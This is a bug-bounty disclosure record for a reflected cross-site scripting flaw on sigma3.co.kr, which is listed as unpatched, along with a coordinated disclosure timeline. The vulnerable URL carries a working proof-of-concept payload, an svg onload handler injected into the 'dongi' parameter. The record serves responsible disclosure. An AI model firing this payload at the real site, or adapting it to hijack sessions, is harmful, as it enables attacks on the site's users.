sigma3.co.kr XSS vulnerability

2017-06-22T03:36:00
ID OBB:251193
Type openbugbounty
Reporter keritzy
Modified 2017-06-29T10:15:00

Description

Vulnerable URL:
http://sigma3.co.kr/info_list.php?dongi=%22%3E%3Csvg/onload=confirm(/OPENBUGBOUNTY/)%3E%EC%84%9C%ED%98%84%EB%8F%99&categoryi;=undefined&parti;=undefined&maemae;_money1=undefined&maemae;_money2=undefined&jen;_money1=undefined&jen;_money2=undefined&security;_money1=undefined&security;_money2=undefined&month;_money1=undefined&month;_money2=undefined&good1;=undefined&good2;=undefined&good3;=undefined&good4;=undefined&good5;=undefined&good6;=undefined&good7;=undefined&good8;=undefined&good9;=undefined&good1;=undefined&thema1;=undefined&thema2;=undefined&thema3;=undefined&thema4;=undefined&thema5;=undefined&thema6;=undefined&thema7;=undefined&thema8;=undefined&thema9;=undefined&thema1;=undefined&id;=undefined&maemae;_moneyi=undefined&jen;_moneyi=undefined&security;_moneyi=undefined&month;_moneyi=undefined
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check sigma3.co.kr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 June, 2017 03:36 GMT
Generic security notifications sent to website owner| 22 June, 2017 09:19 GMT
Notification sent to subscribers (without technical details)| 22 June, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2017 10:15 GMT